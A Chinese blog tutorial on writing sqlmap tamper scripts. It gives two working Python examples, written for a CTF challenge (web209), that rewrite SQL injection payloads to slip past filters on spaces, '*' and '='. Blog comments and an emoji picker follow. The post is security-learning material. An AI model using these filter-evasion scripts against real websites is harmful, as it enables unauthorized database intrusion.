【原创】编写sqlmap–tamper脚本

注意:目前最新的sqlmap已经不能有中文了,注释的也不行

sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等

我们先来分析一下我的原创脚本web209

#!/usr/bin/env python
"""
Author: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web209 tamper<<<\n")
def tamper(payload, **kwargs):  
    payload = payload.replace(" ",  chr(0x09))  
    payload = payload.replace("*", chr(0x31))
    payload = payload.replace("=",  chr(0x09))
    return payload  

分为了import部分、__priority__ 属性、dependencies函数、tamper函数以及用户自定义的函数

import部分

这一部分我们可以导入sqlmap的内部库

前两个库不用管

第三个库dependencies主要是用来提醒用户的

函数则这样写

def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web209 tamper<<<\n")

Tamper

前面的都花里胡哨的,这里才是核心

编写此脚本的题目是过滤了”=” “*” “空格”这三个

我们围绕这三个进行编写即可

暂时就说这么简单

其实还有种更加正确的方法

根据官方脚本进行改编

space2comment.py //把空格替换为/**/

我把注释加上一看便知

贴一个由上题改编的脚本

还是出自web209

#!/usr/bin/env python
"""
Author: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>webweb209 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == "*":
                retVal += chr(0x31)
                continue
            elif payload[i] == "=":
                retVal += chr(0x09) + 'LIKE' + chr(0x09)
                continue
            elif payload[i] == " ":
                retVal += chr(0x09)
                continue
            retVal += payload[i]
    return retVal

参考文章:

如何编写Sqlmap的Tamper脚本?

==>转载请注明来源哦<==

评论

  1. huayang
    huayang 博主
    Macintosh Chrome
    10月前
    2021-4-10 12:41:24

    回复测试

  2. 头像
    hua
    Macintosh Safari
    10月前
    2021-4-10 12:40:35

    测试2

  3. 头像
    hua
    Macintosh Safari
    10月前
    2021-4-10 12:39:26

    测试

  4. 头像
    ze
    10月前
    2021-4-05 10:06:09

    我来看看

  5. 头像
    暗霄白虹
    10月前
    2021-3-31 23:40:01

    康康

  6. 华扬
    华扬 博主
    10月前
    2021-3-20 11:14:40

    哈哈,欢迎呀

  7. 头像
    清墨啊
    10月前
    2021-3-19 20:36:02

    我下次还要来康康。

  8. 华扬
    华扬 博主
    11月前
    2021-3-01 22:35:04

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇